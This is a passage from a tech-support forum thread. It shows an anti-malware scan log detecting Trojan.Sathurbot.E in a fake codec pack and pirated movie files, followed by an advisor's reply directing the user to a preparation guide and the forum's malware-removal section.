Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\5fc9283d2e7d46535121d14130ddd344\Batman v Superman Dawn of Justice.avi --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\5fc9283d2e7d46535121d14130ddd344\Batman v Superman Dawn of Justice.txt --> [Trojan.Sathurbot.E]

Infected: C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\5fc9283d2e7d46535121d14130ddd344\Ultra XVid Codec Pack.exe --> [Trojan.Sathurbot.E]

Scan finished

Creating System Restore point...

Cleaning up...

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Executing an action cmd.exe...

Success!

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Queuing an action cmd.exe

Removal scheduling successful. System shutdown needed.

System shutdown occurred

=======================================



#11 Broni

Broni

    The Coolest BC Computer


  • BC Advisor
  • 42,611 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Daly City, CA
  • Local time:02:07 PM

Posted 02 March 2017 - 05:38 PM

We're not allowed to run any MBAR fixes in this forum, so...

 

Please follow the instructions in THIS GUIDE starting at Step 6. If you cannot complete a step, skip it and continue.

Once the proper logs are created, then make a NEW TOPIC and post it HERE. Please include a description of your computer issues, what you have done to resolve them, and a link to this topic.

If you can produce at least some of the logs, then please create the new topic and explain what happens when you try to create the log(s) that you couldn't get. If you cannot produce any of the logs, then still post the topic and explain that you followed the Prep. Guide, were unable to create the logs, and describe what happens when you try to create the logs.

It would be helpful if you post a note here once you have completed the steps in the guide and have started your topic in malware removal. Good luck and be patient.

If HelpBot replies to your topic, PLEASE follow Step One so it will report your topic to the team members.


My Website

p4433470.gif

My help doesn't cost a penny, but if you'd like to consider a donation, click p22001735.gif


 





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users